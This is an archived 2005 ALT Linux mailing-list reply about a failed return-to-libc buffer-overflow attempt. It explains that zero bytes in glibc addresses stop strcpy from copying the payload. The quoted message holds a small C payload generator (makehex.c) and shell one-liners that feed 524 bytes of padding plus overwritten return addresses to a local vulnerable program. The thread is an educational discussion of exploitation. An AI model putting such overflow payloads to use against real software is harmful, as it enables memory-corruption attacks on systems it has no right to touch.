From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Message-ID: <41F5589F.10508@altlinux.ru> Date: Mon, 24 Jan 2005 23:20:47 +0300 From: Egor Grebnev Organization: ALT Linux Team User-Agent: Mozilla Thunderbird 1.0 (X11/20050110) X-Accept-Language: en-us, en MIME-Version: 1.0 To: community-en@altlinux.org Subject: Re: [Comm-en] System call via buffer overflow not working References: In-Reply-To: Content-Type: text/plain; charset=KOI8-R; format=flowed Content-Transfer-Encoding: 7bit Cc: X-BeenThere: community-en@altlinux.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: community-en@altlinux.org List-Id: "Mailing list for ALT Linux users \(in English only\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 24 Jan 2005 20:23:24 -0000 Archived-At: List-Archive: List-Post: Aaron, A small comment from Dmitry Levin, a lead developer who isn't subscribed to this mailing list yet. I hope that the original meaning hasn't been lost during translation from Russian ;-) The technique that you are trying to master is called return-to-libc. It is a bit more complex since in the string view the function addresses from our glibc are zero bytes. As a result, strcpy in your sample only copies a part of the string, and the sample doesn't work. You can make a Google search on this topic, many things were written about it some time ago. Aaron McDonald wrote: > Here are the typo fixes from my previous email: > > //makehex.c > main() { > char pad[524]; > int i; > for (i=0; i < 524; i++) > pad[i] = 'A'; > pad[524]='\0'; > > printf("%s\xe0\x9e\x16\x00\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf", pad); > } > > ./vulner1 $(perl -e 'print "A"x524')$(printf > > "\xec\x83\x04\x08\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf") > or > ./vulner1 $(./makehex) //don't forget to update and recompile makehex > > > _______________________________________________ > Community-en mailing list > Community-en@altlinux.org > https://lists.altlinux.org/mailman/listinfo/community-en